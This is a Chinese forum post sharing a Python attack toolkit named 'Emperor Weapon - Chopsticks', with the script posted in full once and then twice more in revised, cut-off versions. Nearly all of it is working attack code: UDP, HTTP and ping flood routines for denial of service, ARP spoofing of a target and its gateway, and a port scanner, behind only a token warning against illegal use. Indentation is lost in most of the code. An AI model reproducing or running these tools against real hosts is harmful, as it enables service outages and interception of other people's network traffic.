本帖最后由 Zephyr 于 2025-11-2 14:18 编辑
import time
import socket
import random
import os
import threading
import requests
from datetime import datetime
import concurrent.futures
import urllib3
from requests.adapters import HTTPAdapter
import sys
import subprocess
# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 颜色代码
class Colors:
    """ANSI escape sequences used to style terminal output."""

    # Bright foreground colors.
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    WHITE = '\033[97m'
    # Text attributes.
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    # Resets every color/attribute set above.
    END = '\033[0m'
def print_banner():
"""打印辉煌的横幅"""
os.system("clear")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}")
print(" ╔══════════════════════════════════╗")
print(" ║ 帝兵-筷子 终极版 ║")
print(" ║ EMPEROR WEAPON - CHOPSTICKS ║")
print(" ╚══════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.YELLOW} 网络安全测试工具集合")
print(f"{Colors.GREEN} 作者: 跨紫大帝")
print(f"{Colors.RED} 警告:请勿用于非法用途")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
def print_menu():
"""打印菜单"""
print(f"\n{Colors.CYAN}{Colors.BOLD}🏹 请选择攻击模式:{Colors.END}")
print(f"{Colors.GREEN}┌────────────────────────────────────────────┐")
print(f"│ {Colors.YELLOW}1.{Colors.END} 🔥 UDP洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}2.{Colors.END} ⚡ 超级CC攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}3.{Colors.END} 🌐 ARP欺骗攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}4.{Colors.END} 🔍 快速端口扫描 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}5.{Colors.END} 🎯 Ping洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}6.{Colors.END} ❌ 退出程序 {Colors.GREEN}│")
print(f"└────────────────────────────────────────────┘{Colors.END}")
def is_valid_ip(ip):
    """Return True only if *ip* is a strict dotted-quad IPv4 address.

    ``socket.inet_aton`` is too permissive for input validation: it accepts
    shorthand forms such as ``"1"`` or ``"127.1"``, and it raises
    ``TypeError`` (not caught by ``except socket.error``) for non-string
    input such as ``None``.

    Args:
        ip: Candidate address, normally a string read from user input.

    Returns:
        bool: True for exactly four decimal octets in 0-255, otherwise False.
    """
    import ipaddress  # local import: not part of the file's import block

    # IPv4Address also accepts ints and packed bytes; only text counts here.
    if not isinstance(ip, str):
        return False
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return False
    return True
def get_mac(ip):
"""获取IP对应的MAC地址"""
try:
# 使用arp命令获取MAC地址
result = subprocess.check_output(f"arp -n {ip}", shell=True, text=True)
lines = result.split('\n')
for line in lines:
if ip in line:
parts = line.split()
if len(parts) >= 3:
return parts[2]
return None
except:
return None
def arp_spoof():
"""ARP欺骗攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🌐 ARP欺骗攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
target_ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
gateway_ip = input(f"{Colors.YELLOW}🌐 网关IP: {Colors.END}")
if not is_valid_ip(target_ip) or not is_valid_ip(gateway_ip):
print(f"{Colors.RED}❌ IP地址格式错误!{Colors.END}")
return
print(f"\n{Colors.YELLOW}🔍 正在获取MAC地址...{Colors.END}")
target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)
if not target_mac or not gateway_mac:
print(f"{Colors.RED}❌ 无法获取MAC地址,请检查网络连接{Colors.END}")
return
print(f"{Colors.GREEN}✅ 目标MAC: {target_mac}{Colors.END}")
print(f"{Colors.GREEN}✅ 网关MAC: {gateway_mac}{Colors.END}")
print(f"\n{Colors.RED}💥 开始ARP欺骗攻击...{Colors.END}")
print(f"{Colors.YELLOW}🎯 目标: {target_ip} -> 网关: {gateway_ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
sent_packets = 0
start_time = time.time()
try:
while not stop_attack:
try:
# 发送ARP欺骗包 - 告诉目标我是网关
cmd1 = f"arpspoof -i wlan0 -t {target_ip} {gateway_ip} > /dev/null 2>&1 &"
# 发送ARP欺骗包 - 告诉网关我是目标
cmd2 = f"arpspoof -i wlan0 -t {gateway_ip} {target_ip} > /dev/null 2>&1 &"
os.system(cmd1)
os.system(cmd2)
sent_packets += 2
elapsed_time = time.time() - start_time
print(f"\r{Colors.GREEN}📤 已发送: {sent_packets} ARP包 | ⏱️ 时长: {elapsed_time:.1f}秒 | 🎯 目标: {target_ip} <-> 网关: {gateway_ip}{Colors.END}", end="", flush=True)
time.sleep(2) # 每2秒发送一次
except Exception as e:
print(f"\n{Colors.RED}❌ 发送ARP包失败: {e}{Colors.END}")
time.sleep(1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.YELLOW}🛑 停止ARP攻击,恢复ARP表...{Colors.END}")
# 恢复ARP表
try:
os.system("pkill arpspoof")
time.sleep(2)
print(f"{Colors.GREEN}✅ ARP表已恢复{Colors.END}")
except:
print(f"{Colors.RED}❌ 恢复ARP表失败{Colors.END}")
def quick_port_scan():
"""快速端口扫描"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔍 快速端口扫描{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
target = input(f"{Colors.YELLOW}🎯 目标IP或域名: {Colors.END}")
# 常见端口列表
common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 993, 995,
2082, 2083, 2086, 2087, 2095, 3306, 3389, 5432, 5900, 8080, 8443]
print(f"\n{Colors.GREEN}🚀 快速扫描 {Colors.CYAN}{target}{Colors.GREEN} 的 {len(common_ports)} 个常见端口{Colors.END}")
print(f"{Colors.YELLOW}⏳ 扫描中...{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
open_ports = []
start_time = time.time()
def scan_port(port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((target, port))
sock.close()
return port, result == 0
except:
return port, False
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
future_to_port = {executor.submit(scan_port, port): port for port in common_ports}
for i, future in enumerate(concurrent.futures.as_completed(future_to_port)):
port, is_open = future.result()
if is_open:
open_ports.append(port)
progress = ((i + 1) / len(common_ports)) * 100
print(f"\r{Colors.CYAN}📈 进度: {progress:.1f}% | 🟢 发现开放端口: {len(open_ports)}{Colors.END}", end="", flush=True)
elapsed_time = time.time() - start_time
print(f"\n\n{Colors.GREEN}✅ 扫描完成!耗时: {elapsed_time:.1f}秒{Colors.END}")
if open_ports:
print(f"\n{Colors.GREEN}🎯 开放的端口:{Colors.END}")
common_services = {
21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP", 53: "DNS",
80: "HTTP", 110: "POP3", 143: "IMAP", 443: "HTTPS", 993: "IMAPS",
995: "POP3S", 2082: "cPanel", 2083: "cPanel SSL", 2086: "WHM",
2087: "WHM SSL", 2095: "Webmail", 3306: "MySQL", 3389: "RDP",
5432: "PostgreSQL", 5900: "VNC", 8080: "HTTP-alt", 8443: "HTTPS-alt"
}
for port in sorted(open_ports):
service = common_services.get(port, "未知服务")
status_color = Colors.GREEN if port in [80, 443, 22] else Colors.YELLOW
print(f" {status_color}Port {port}/TCP{Colors.END} - {Colors.CYAN}{service}{Colors.END}")
else:
print(f"{Colors.RED}❌ 没有发现开放的常见端口{Colors.END}")
def super_cc_attack():
"""超级CC攻击(带详细过程显示)"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}⚡ 超级CC攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
url = input(f"{Colors.YELLOW}🎯 目标URL (包含http://): {Colors.END}")
threads_count = int(input(f"{Colors.YELLOW}⚡ 攻击线程数(10-500): {Colors.END}"))
if threads_count < 10:
threads_count = 10
if threads_count > 500:
threads_count = 500
print(f"\n{Colors.RED}💥 开始超级CC攻击 {Colors.CYAN}{url}{Colors.END}")
print(f"{Colors.YELLOW}🎯 攻击线程: {threads_count}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
total_requests = 0
successful_requests = 0
failed_requests = 0
start_time = time.time()
# 统计信息
status_codes = {}
last_print_time = time.time()
# 用户代理列表
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/537.36',
'Mozilla/5.0 (Android 10; Mobile) AppleWebKit/537.36'
]
def http_flood(thread_id):
nonlocal total_requests, successful_requests, failed_requests
session = create_session()
while not stop_attack:
try:
headers = {
'User-Agent': random.choice(user_agents),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'
}
response = session.get(url, headers=headers, verify=False, timeout=2)
successful_requests += 1
# 统计状态码
status_code = response.status_code
status_codes[status_code] = status_codes.get(status_code, 0) + 1
except Exception as e:
failed_requests += 1
finally:
total_requests += 1
# 启动攻击线程
threads = []
for i in range(threads_count):
thread = threading.Thread(target=http_flood, args=(i,))
thread.daemon = True
threads.append(thread)
thread.start()
# 实时显示攻击过程
last_total = 0
try:
while not stop_attack:
current_time = time.time()
elapsed_time = current_time - start_time
# 每秒更新显示
if current_time - last_print_time >= 0.5:
current_total = total_requests
requests_per_sec = (current_total - last_total) * 2 # 因为是0.5秒更新
last_total = current_total
last_print_time = current_time
avg_speed = current_total / elapsed_time if elapsed_time > 0 else 0
# 清屏并显示攻击面板
os.system('clear')
print(f"{Colors.RED}{Colors.BOLD}")
print("╔══════════════════════════════════════════════════════════════╗")
print("║ ⚡ 超级CC攻击进行中 ⚡ ║")
print("╚══════════════════════════════════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.CYAN}🎯 攻击目标: {Colors.YELLOW}{url}{Colors.END}")
print(f"{Colors.CYAN}🚀 攻击线程: {Colors.GREEN}{threads_count}{Colors.END}")
print(f"{Colors.CYAN}⏱️ 攻击时长: {Colors.YELLOW}{elapsed_time:.1f}秒{Colors.END}")
print()
# 主要统计信息
print(f"{Colors.GREEN}📊 总请求数: {Colors.WHITE}{total_requests:,}{Colors.END}")
print(f"{Colors.GREEN}✅ 成功请求: {Colors.WHITE}{successful_requests:,}{Colors.END}")
print(f"{Colors.RED}❌ 失败请求: {Colors.WHITE}{failed_requests:,}{Colors.END}")
print()
# 速度信息
print(f"{Colors.YELLOW}⚡ 实时速度: {Colors.WHITE}{requests_per_sec:,.0f} 请求/秒{Colors.END}")
print(f"{Colors.YELLOW}📈 平均速度: {Colors.WHITE}{avg_speed:,.0f} 请求/秒{Colors.END}")
print()
# 状态码分布
if status_codes:
print(f"{Colors.CYAN}🎯 HTTP状态码分布:{Colors.END}")
for code, count in sorted(status_codes.items()):
color = Colors.GREEN if code == 200 else Colors.YELLOW if code < 400 else Colors.RED
print(f" {color}HTTP {code}: {count:,}{Colors.END}")
print()
# 攻击强度显示
intensity = min(threads_count // 10, 50)
print(f"{Colors.RED}💥 攻击强度: {Colors.WHITE}{'█' * intensity}{'░' * (50 - intensity)}{Colors.END}")
print()
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
time.sleep(0.1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.RED}🛑 攻击停止!{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
final_stats = f"""
{Colors.CYAN}📊 最终攻击统计:{Colors.END}
{Colors.YELLOW}⏱️ 总运行时间: {Colors.GREEN}{time.time() - start_time:.1f}秒{Colors.END}
{Colors.YELLOW}📨 总请求数: {Colors.GREEN}{total_requests:,}{Colors.END}
{Colors.YELLOW}✅ 成功请求: {Colors.GREEN}{successful_requests:,}{Colors.END}
{Colors.YELLOW}❌ 失败请求: {Colors.RED}{failed_requests:,}{Colors.END}
{Colors.YELLOW}📈 平均速度: {Colors.GREEN}{total_requests/(time.time() - start_time):.0f} 请求/秒{Colors.END}
"""
print(final_stats)
def create_session():
"""创建优化的session"""
session = requests.Session()
adapter = HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=0)
session.mount('http://', adapter)
session.mount('https://', adapter)
session.request = lambda method, url, **kwargs: session.request(
method, url, timeout=2, **kwargs
)
return session
def udp_flood():
"""UDP洪水攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔥 UDP洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
port = int(input(f"{Colors.YELLOW}🎯 目标端口: {Colors.END}"))
speed = int(input(f"{Colors.YELLOW}⚡ 攻击速度(1~1000): {Colors.END}"))
print(f"\n{Colors.RED}💥 开始UDP攻击 {Colors.CYAN}{ip}:{port}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes_data = random._urandom(1490)
sent = 0
start_time = time.time()
try:
while True:
sock.sendto(bytes_data, (ip, port))
sent += 1
elapsed_time = time.time() - start_time
speed_actual = sent / elapsed_time if elapsed_time > 0 else 0
print(f"\r{Colors.GREEN}📤 已发送: {sent:,} 包 | ⚡ 速度: {speed_actual:.0f} 包/秒 | ⏱️ 时长: {elapsed_time:.1f}秒{Colors.END}", end="", flush=True)
time.sleep((1000 - speed) / 2000)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 UDP攻击停止,总共发送 {sent:,} 个数据包{Colors.END}")
except Exception as e:
print(f"\n{Colors.RED}❌ 发生错误: {e}{Colors.END}")
finally:
sock.close()
def ping_flood():
"""Ping洪水攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🎯 Ping洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
print(f"\n{Colors.RED}💥 开始Ping攻击 {Colors.CYAN}{ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sent = 0
start_time = time.time()
try:
while True:
# 使用系统ping命令
response = os.system(f"ping -c 1 -s 65500 {ip} > /dev/null 2>&1")
sent += 1
elapsed_time = time.time() - start_time
speed_actual = sent / elapsed_time if elapsed_time > 0 else 0
print(f"\r{Colors.GREEN}📤 已发送: {sent:,} Ping包 | ⚡ 速度: {speed_actual:.1f} 包/秒 | ⏱️ 时长: {elapsed_time:.1f}秒{Colors.END}", end="", flush=True)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 Ping攻击停止,总共发送 {sent:,} 个数据包{Colors.END}")
def main_menu():
"""主菜单"""
while True:
print_banner()
print_menu()
choice = input(f"\n{Colors.YELLOW}🎯 请选择功能 (1-6): {Colors.END}")
if choice == '1':
udp_flood()
elif choice == '2':
super_cc_attack()
elif choice == '3':
arp_spoof()
elif choice == '4':
quick_port_scan()
elif choice == '5':
ping_flood()
elif choice == '6':
print(f"\n{Colors.CYAN}👋 感谢使用帝兵-筷子,再见!{Colors.END}")
exit()
else:
print(f"\n{Colors.RED}❌ 无效选择,请重新输入{Colors.END}")
time.sleep(1)
continue
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
if __name__ == "__main__":
try:
main_menu()
except KeyboardInterrupt:
print(f"\n\n{Colors.CYAN}👋 程序已退出{Colors.END}") |
import socket
import random
import os
import threading
import requests
from datetime import datetime
import urllib3
import sys
import subprocess
# 尝试导入并发库,如果失败使用备用方案
try:
from concurrent.futures import ThreadPoolExecutor
HAS_CONCURRENT = True
except ImportError:
HAS_CONCURRENT = False
print("警告: concurrent.futures 不可用,使用线程模式")
try:
from requests.adapters import HTTPAdapter
HAS_REQUESTS_ADAPTER = True
except ImportError:
HAS_REQUESTS_ADAPTER = False
# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 颜色代码
class Colors:
    """ANSI escape sequences used to style terminal output."""

    # Bright foreground colors.
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    WHITE = '\033[97m'
    # Text attributes.
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    # Resets every color/attribute set above.
    END = '\033[0m'
def print_banner():
"""打印辉煌的横幅"""
os.system("clear")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}")
print(" ╔══════════════════════════════════╗")
print(" ║ 帝兵-筷子 终极版 ║")
print(" ║ EMPEROR WEAPON - CHOPSTICKS ║")
print(" ╚══════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.YELLOW} 网络安全测试工具集合")
print(f"{Colors.GREEN} 作者: 跨紫大帝")
print(f"{Colors.RED} 警告:请勿用于非法用途")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
def print_menu():
"""打印菜单"""
print(f"\n{Colors.CYAN}{Colors.BOLD}🏹 请选择攻击模式:{Colors.END}")
print(f"{Colors.GREEN}┌────────────────────────────────────────────┐")
print(f"│ {Colors.YELLOW}1.{Colors.END} 🔥 UDP洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}2.{Colors.END} ⚡ 超级CC攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}3.{Colors.END} 🌐 ARP欺骗攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}4.{Colors.END} 🔍 快速端口扫描 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}5.{Colors.END} 🎯 Ping洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}6.{Colors.END} 📊 系统信息 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}7.{Colors.END} ❌ 退出程序 {Colors.GREEN}│")
print(f"└────────────────────────────────────────────┘{Colors.END}")
def check_dependencies():
    """Report which required third-party packages cannot be imported.

    Returns:
        list[str]: Names of the missing packages in the order checked
        ("requests" first, then "urllib3"); empty when both import cleanly.
    """
    unavailable = []
    for package in ("requests", "urllib3"):
        try:
            __import__(package)
        except ImportError:
            unavailable.append(package)
    return unavailable
def show_system_info():
"""显示系统信息"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}📊 系统信息{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# Python信息
print(f"{Colors.YELLOW}🐍 Python版本: {Colors.GREEN}{sys.version}{Colors.END}")
# 检查依赖
missing_deps = check_dependencies()
if missing_deps:
print(f"{Colors.RED}❌ 缺少依赖: {', '.join(missing_deps)}{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pip install {' '.join(missing_deps)}{Colors.END}")
else:
print(f"{Colors.GREEN}✅ 所有依赖已安装{Colors.END}")
# 网络信息
try:
hostname = socket.gethostname()
print(f"{Colors.YELLOW}🌐 主机名: {Colors.GREEN}{hostname}{Colors.END}")
except:
pass
# 系统时间
print(f"{Colors.YELLOW}⏰ 系统时间: {Colors.GREEN}{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
def is_valid_ip(ip):
    """Return True only if *ip* is a strict dotted-quad IPv4 address.

    ``socket.inet_aton`` is too permissive for input validation: it accepts
    shorthand forms such as ``"1"`` or ``"127.1"``, and it raises
    ``TypeError`` (not caught by ``except socket.error``) for non-string
    input such as ``None``.

    Args:
        ip: Candidate address, normally a string read from user input.

    Returns:
        bool: True for exactly four decimal octets in 0-255, otherwise False.
    """
    import ipaddress  # local import: not part of the file's import block

    # IPv4Address also accepts ints and packed bytes; only text counts here.
    if not isinstance(ip, str):
        return False
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return False
    return True
def get_mac(ip):
"""获取IP对应的MAC地址"""
try:
# 使用arp命令获取MAC地址
result = subprocess.check_output(f"arp -n {ip}", shell=True, text=True, stderr=subprocess.DEVNULL)
lines = result.split('\n')
for line in lines:
if ip in line:
parts = line.split()
if len(parts) >= 3:
return parts[2]
return None
except:
return None
def check_arpspoof():
"""检查arpspoof是否可用"""
try:
subprocess.run(["which", "arpspoof"], check=True, capture_output=True)
return True
except:
return False
def arp_spoof():
"""ARP欺骗攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🌐 ARP欺骗攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# 检查arpspoof是否安装
if not check_arpspoof():
print(f"{Colors.RED}❌ arpspoof 未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pkg install dsniff{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
target_ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
gateway_ip = input(f"{Colors.YELLOW}🌐 网关IP: {Colors.END}")
if not is_valid_ip(target_ip) or not is_valid_ip(gateway_ip):
print(f"{Colors.RED}❌ IP地址格式错误!{
使用道具 举报
import socket
import random
import os
import threading
import requests
from datetime import datetime
import urllib3
import sys
import subprocess
# 尝试导入并发库,如果失败使用备用方案
try:
from concurrent.futures import ThreadPoolExecutor
HAS_CONCURRENT = True
except ImportError:
HAS_CONCURRENT = False
print("警告: concurrent.futures 不可用,使用线程模式")
try:
from requests.adapters import HTTPAdapter
HAS_REQUESTS_ADAPTER = True
except ImportError:
HAS_REQUESTS_ADAPTER = False
# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 颜色代码
class Colors:
    """ANSI escape sequences used to style terminal output."""

    # Bright foreground colors.
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    WHITE = '\033[97m'
    # Text attributes.
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    # Resets every color/attribute set above.
    END = '\033[0m'
def print_banner():
"""打印辉煌的横幅"""
os.system("clear")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}")
print(" ╔══════════════════════════════════╗")
print(" ║ 帝兵-筷子 终极版 ║")
print(" ║ EMPEROR WEAPON - CHOPSTICKS ║")
print(" ╚══════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.YELLOW} 网络安全测试工具集合")
print(f"{Colors.GREEN} 作者: 跨紫大帝")
print(f"{Colors.RED} 警告:请勿用于非法用途")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
def print_menu():
"""打印菜单"""
print(f"\n{Colors.CYAN}{Colors.BOLD}🏹 请选择攻击模式:{Colors.END}")
print(f"{Colors.GREEN}┌────────────────────────────────────────────┐")
print(f"│ {Colors.YELLOW}1.{Colors.END} 🔥 UDP洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}2.{Colors.END} ⚡ 超级CC攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}3.{Colors.END} 🌐 ARP欺骗攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}4.{Colors.END} 🔍 快速端口扫描 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}5.{Colors.END} 🎯 Ping洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}6.{Colors.END} 📊 系统信息 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}7.{Colors.END} ❌ 退出程序 {Colors.GREEN}│")
print(f"└────────────────────────────────────────────┘{Colors.END}")
def check_dependencies():
    """Report which required third-party packages cannot be imported.

    Returns:
        list[str]: Names of the missing packages in the order checked
        ("requests" first, then "urllib3"); empty when both import cleanly.
    """
    unavailable = []
    for package in ("requests", "urllib3"):
        try:
            __import__(package)
        except ImportError:
            unavailable.append(package)
    return unavailable
def show_system_info():
"""显示系统信息"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}📊 系统信息{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# Python信息
print(f"{Colors.YELLOW}🐍 Python版本: {Colors.GREEN}{sys.version}{Colors.END}")
# 检查依赖
missing_deps = check_dependencies()
if missing_deps:
print(f"{Colors.RED}❌ 缺少依赖: {', '.join(missing_deps)}{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pip install {' '.join(missing_deps)}{Colors.END}")
else:
print(f"{Colors.GREEN}✅ 所有依赖已安装{Colors.END}")
# 网络信息
try:
hostname = socket.gethostname()
print(f"{Colors.YELLOW}🌐 主机名: {Colors.GREEN}{hostname}{Colors.END}")
except:
pass
# 系统时间
print(f"{Colors.YELLOW}⏰ 系统时间: {Colors.GREEN}{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
def is_valid_ip(ip):
    """Return True only if *ip* is a strict dotted-quad IPv4 address.

    ``socket.inet_aton`` is too permissive for input validation: it accepts
    shorthand forms such as ``"1"`` or ``"127.1"``, and it raises
    ``TypeError`` (not caught by ``except socket.error``) for non-string
    input such as ``None``.

    Args:
        ip: Candidate address, normally a string read from user input.

    Returns:
        bool: True for exactly four decimal octets in 0-255, otherwise False.
    """
    import ipaddress  # local import: not part of the file's import block

    # IPv4Address also accepts ints and packed bytes; only text counts here.
    if not isinstance(ip, str):
        return False
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return False
    return True
def get_mac(ip):
"""获取IP对应的MAC地址"""
try:
# 使用arp命令获取MAC地址
result = subprocess.check_output(f"arp -n {ip}", shell=True, text=True, stderr=subprocess.DEVNULL)
lines = result.split('\n')
for line in lines:
if ip in line:
parts = line.split()
if len(parts) >= 3:
return parts[2]
return None
except:
return None
def check_arpspoof():
"""检查arpspoof是否可用"""
try:
subprocess.run(["which", "arpspoof"], check=True, capture_output=True)
return True
except:
return False
def arp_spoof():
"""ARP欺骗攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🌐 ARP欺骗攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# 检查arpspoof是否安装
if not check_arpspoof():
print(f"{Colors.RED}❌ arpspoof 未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pkg install dsniff{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
target_ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
gateway_ip = input(f"{Colors.YELLOW}🌐 网关IP: {Colors.END}")
if not is_valid_ip(target_ip) or not is_valid_ip(gateway_ip):
print(f"{Colors.RED}❌ IP地址格式错误!{Colors.END}")
return
print(f"\n{Colors.YELLOW}🔍 正在获取MAC地址...{Colors.END}")
target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)
if not target_mac:
print(f"{Colors.RED}❌ 无法获取目标MAC地址{Colors.END}")
return
if not gateway_mac:
print(f"{Colors.RED}❌ 无法获取网关MAC地址{Colors.END}")
return
print(f"{Colors.GREEN}✅ 目标MAC: {target_mac}{Colors.END}")
print(f"{Colors.GREEN}✅ 网关MAC: {gateway_mac}{Colors.END}")
print(f"\n{Colors.RED}💥 开始ARP欺骗攻击...{Colors.END}")
print(f"{Colors.YELLOW}🎯 目标: {target_ip} -> 网关: {gateway_ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
sent_packets = 0
start_time = time.time()
arpspoof_processes = []
try:
while not stop_attack:
try:
# 发送ARP欺骗包
proc1 = subprocess.Popen(["arpspoof", "-i", "wlan0", "-t", target_ip, gateway_ip],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
proc2 = subprocess.Popen(["arpspoof", "-i", "wlan0", "-t", gateway_ip, target_ip],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
arpspoof_processes.extend([proc1, proc2])
sent_packets += 2
elapsed_time = time.time() - start_time
print(f"\r{Colors.GREEN}📤 已发送: {sent_packets} ARP包 | ⏱️ 时长: {elapsed_time:.1f}秒 | 🎯 目标: {target_ip} <-> 网关: {gateway_ip}{Colors.END}", end="", flush=True)
time.sleep(2)
# 清理旧的进程
for proc in arpspoof_processes[:]:
if proc.poll() is not None:
arpspoof_processes.remove(proc)
except Exception as e:
print(f"\n{Colors.RED}❌ 发送ARP包失败: {e}{Colors.END}")
time.sleep(1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.YELLOW}🛑 停止ARP攻击,恢复ARP表...{Colors.END}")
# 杀死所有arpspoof进程
for proc in arpspoof_processes:
try:
proc.terminate()
except:
pass
# 额外清理
os.system("pkill arpspoof 2>/dev/null")
time.sleep(2)
